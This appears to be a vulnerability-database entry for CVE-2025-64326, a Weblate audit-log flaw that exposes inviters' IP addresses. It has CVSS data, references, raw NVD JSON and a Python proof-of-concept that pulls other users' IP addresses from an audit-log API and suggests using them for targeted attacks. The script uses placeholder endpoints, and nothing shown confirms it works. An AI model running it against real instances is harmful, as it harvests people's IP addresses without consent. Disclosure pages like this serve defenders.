CVE-2025-64326

Description

Weblate is a web based localization tool. In versions 5.14 and below, Weblate leaks the IP address of the project member inviting the user to the project in the audit log. The audit log includes IP addresses from admin-triggered actions, which can be viewed by invited users. This issue is fixed in version 5.14.1.

CVSS Details

CVSS Score

2.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:* - VULNERABLE

Weblate < 5.14.1

Weblate 5.14

Weblate 5.13.x

Weblate 5.12.x

Weblate 5.11.x及更低版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-64326 PoC - Weblate IP Address Disclosure in Audit Log
# This PoC demonstrates the information disclosure vulnerability

import requests
import json

TARGET_URL = "https://vulnerable-weblate-instance.com"
ATTACKER_TOKEN = "attacker_user_token"
PROJECT_SLUG = "target_project"

def exploit_ip_disclosure():
    """
    Steps to exploit CVE-2025-64326:
    1. Attacker receives invitation to a project
    2. Attacker authenticates and views audit log
    3. Attacker extracts inviter's IP address from audit entries
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Step 1: View project audit log (requires invitation acceptance)
    audit_url = f"{TARGET_URL}/api/projects/{PROJECT_SLUG}/audit/"
    response = requests.get(audit_url, headers=headers)
    
    if response.status_code == 200:
        audit_data = response.json()
        print("[+] Successfully accessed audit log")
        
        # Step 2: Extract IP addresses from audit entries
        leaked_ips = []
        for entry in audit_data.get('results', []):
            if 'ip_address' in entry:
                ip = entry['ip_address']
                action = entry.get('action', 'unknown')
                user = entry.get('user', {}).get('username', 'unknown')
                leaked_ips.append({
                    'ip': ip,
                    'action': action,
                    'user': user,
                    'timestamp': entry.get('timestamp')
                })
                print(f"[+] Leaked IP: {ip} (User: {user}, Action: {action})")
        
        return leaked_ips
    else:
        print(f"[-] Failed to access audit log: {response.status_code}")
        return []

def main():
    print("=" * 60)
    print("CVE-2025-64326 - Weblate Audit Log IP Disclosure PoC")
    print("=" * 60)
    
    leaked_ips = exploit_ip_disclosure()
    
    if leaked_ips:
        print(f"\n[!] Successfully extracted {len(leaked_ips)} IP address(es)")
        print("[!] These IPs can be used for geolocation or targeted attacks")
    else:
        print("\n[-] No IP addresses found or access denied")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64326
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64326
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64326/
[4] VulDB https://vuldb.com/cve/CVE-2025-64326
[5] https://github.com/WeblateOrg/weblate/pull/16781
[6] https://github.com/WeblateOrg/weblate/security/advisories/GHSA-gr35-vpx2-qxhc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64326", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:43.957", "lastModified": "2025-12-04T21:35:38.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weblate is a web based localization tool. In versions 5.14 and below, Weblate leaks the IP address of the project member inviting the user to the project in the audit log. The audit log includes IP addresses from admin-triggered actions, which can be viewed by invited users. This issue is fixed in version 5.14.1."}, {"lang": "es", "value": "Weblate es una herramienta de localización basada en web. En las versiones 5.14 e inferiores, Weblate filtra la dirección IP del miembro del proyecto que invita al usuario al proyecto en el registro de auditoría. El registro de auditoría incluye direcciones IP de acciones iniciadas por administradores, que pueden ser vistas por los usuarios invitados. Este problema está solucionado en la versión 5.14.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.14.1", "matchCriteriaId": "FDF3215A-26DE-48CD-9D80-DAFBBF1105B6"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/weblate/pull/16781", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-gr35-vpx2-qxhc", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}